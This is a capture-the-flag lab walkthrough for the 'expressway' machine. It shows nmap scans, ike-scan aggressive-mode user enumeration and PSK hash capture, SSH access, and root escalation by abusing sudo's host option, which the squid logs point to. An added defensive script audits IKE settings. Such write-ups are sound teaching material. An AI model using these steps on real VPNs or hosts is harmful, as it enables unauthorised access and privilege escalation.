Nmap #
[root@Hacking] /home/kali/expressway
❯ nmap expressway.htb -A
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
It looks like port 22 (SSH) is the only open TCP port, so the next step is a UDP port scan.
[root@Hacking] /home/kali/expressway
❯ nmap expressway.htb -sU --top-ports 100
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
Port 500/udp is the isakmp service; the HackTricks page gives an introduction.
What Is ISAKMP? #
- This is the key port for IPsec VPNs (virtual private networks); it is used for the first step of building a secure tunnel: negotiating the encryption algorithm, authentication method and key exchange.
- IKE works within the ISAKMP framework and establishes security associations (SAs) in phases:
  - Phase 1: establish the IKE secure channel (PSK pre-shared key or certificate authentication, Main/Aggressive Mode).
  - Phase 1.5: optional extended authentication (XAuth, username + password).
  - Phase 2: negotiate the ESP/AH encryption parameters and generate the keys for data transfer (supports Perfect Forward Secrecy).
- Common companion port: 4500/udp → NAT-T (NAT Traversal), the IKE/ESP channel for traversing NAT.
ike-scan #
[root@Hacking] /home/kali/expressway
❯ ike-scan -M expressway.htb
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=aad8df0209c6ca2b)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
- Service confirmed: the target expressway.htb is running IKE (UDP/500) and accepts your proposal.
- Cipher suite:
  - Enc=3DES: Triple DES encryption
  - Hash=SHA1: integrity check
  - Group=2 (modp1024): DH group 2 (1024-bit, weak)
  - Auth=PSK: pre-shared key (Pre-Shared Key) authentication
  - LifeDuration=28800 seconds (key lifetime of about 8 hours)
- Extensions:
  - VID=09002689dfd6b712 (XAUTH) → supports XAuth username/password extended authentication.
  - VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) → used to detect whether the VPN peer is still alive.
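As an added example (not part of the original write-up), a small Python audit that parses an ike-scan host block like the one above and flags the Phase 1 settings a VPN administrator would want to change; the sample text and the weak/strong thresholds are assumptions constructed for this example.

```python
import re

# Constructed sample modelled on the ike-scan Main Mode output above; not a live capture.
SAMPLE_MAIN_MODE = """\
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=aad8df0209c6ca2b)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
"""

# Thresholds are assumptions for this example: no DES/3DES, no MD5/SHA1,
# DH groups below 2048 bits are weak, and PSK with aggressive mode is flagged.
WEAK_ENC = {"DES", "3DES"}
WEAK_HASH = {"MD5", "SHA1"}
WEAK_DH_GROUPS = {"1", "2", "5"}  # modp768, modp1024, modp1536

def parse_sa(text):
    """Return the key=value pairs inside the first SA=(...) block as a dict."""
    m = re.search(r"SA=\(([^)]*)\)", text)
    if not m:
        return {}
    return dict(kv.split("=", 1) for kv in m.group(1).split() if "=" in kv)

def audit_ike(text):
    """Return a list of (code, detail) findings for one ike-scan host block."""
    sa = parse_sa(text)
    findings = []
    enc = sa.get("Enc", "").split("/")[0]      # tolerate "AES/256" style values
    if enc in WEAK_ENC:
        findings.append(("weak-enc", f"Enc={enc}"))
    if sa.get("Hash") in WEAK_HASH:
        findings.append(("weak-hash", f"Hash={sa['Hash']}"))
    group = sa.get("Group", "").split(":")[0]  # "2:modp1024" -> "2"
    if group in WEAK_DH_GROUPS:
        findings.append(("weak-dh", f"Group={sa['Group']}"))
    aggressive = "Aggressive Mode Handshake returned" in text
    if aggressive:
        findings.append(("aggressive-mode", "responder answers aggressive mode"))
    if aggressive and sa.get("Auth") == "PSK":
        # Aggressive mode sends the PSK-derived hash in the clear, enabling offline guessing.
        findings.append(("psk-aggressive", "PSK authentication with aggressive mode"))
    return findings

if __name__ == "__main__":
    for code, detail in audit_ike(SAMPLE_MAIN_MODE):
        print(f"{code}: {detail}")
```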
Bruteforcing-ID #
Next, brute-force the ID; this reveals that the user ike exists.
[root@Hacking] /home/kali/expressway
❯ ike-scan -P -M -A -n fakeID expressway.htb
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=ca95cb3e3af2d7ef)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
68e23758b679b05604e5a16c5c425afc128d8488b7b8e1d4271940cb758ceaf8ec70f3ee4c351c9fa4fc608bea66c1e349887915510b5fa5801ba2d0ea1b04c34f90d71a110282c920a087b5bac426fcf2c256b474ead1519ae7be49f6bb34a459<skip>
Ending ike-scan 1.9.6: 1 hosts scanned in 0.079 seconds (12.59 hosts/sec). 1 returned handshake; 0 returned notify
With the hash in hand, crack the PSK.
User #
Connect over SSH to get the user.
Root #
Check the current user's groups: it belongs to the proxy group, so look for the directories that group owns.
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ find / -group proxy -type d 2>/dev/null
/run/squid
/var/spool/squid
/var/log/squid
One of these files reveals a subdomain, offramp.expressway.htb.
ike@expressway:/var/log/squid$ ls -al
total 28
drwxr-xr-x 2 proxy proxy 4096 Sep 16 16:02 .
drwxr-xr-x 12 root root 4096 Sep 21 02:55 ..
-rw-r----- 1 proxy proxy 4778 Jul 23 01:19 access.log.1
-rw-r----- 1 proxy proxy 20 Jul 22 19:32 access.log.2.gz
-rw-r----- 1 proxy proxy 2192 Jul 23 01:47 cache.log.1
-rw-r----- 1 proxy proxy 941 Jul 23 01:47 cache.log.2.gz
ike@expressway:/var/log/squid$ cat access.log.1 | grep htb
1753229688.902 0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
Also note that the location of sudo is unusual; normally it lives in /usr/bin.
ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
A quick search turns up a vulnerability.
ike@expressway:~$ sudo -h offramp.expressway.htb -l
Matching Defaults entries for ike on offramp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User ike may run the following commands on offramp:
(root) NOPASSWD: ALL
(root) NOPASSWD: ALL
As you can see, the way is wide open.